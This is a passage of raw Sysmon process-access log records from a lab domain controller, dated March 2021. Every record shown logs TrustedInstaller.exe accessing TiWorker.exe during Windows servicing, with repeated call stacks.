4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000006009Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:25.543{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000006008Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:25.527{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000006007Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:25.527{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000006006Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:25.527{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000006005Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:25.511{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000006004Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:25.511{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000006003Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:25.511{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000006002Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:25.511{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000006001Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:25.511{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000006000Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:25.496{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000005999Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:25.496{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000005998Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:25.496{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000005997Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:25.496{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000005996Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:25.496{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000005995Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:25.480{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000005994Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:25.480{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000005993Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:25.480{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000005992Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:25.465{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+5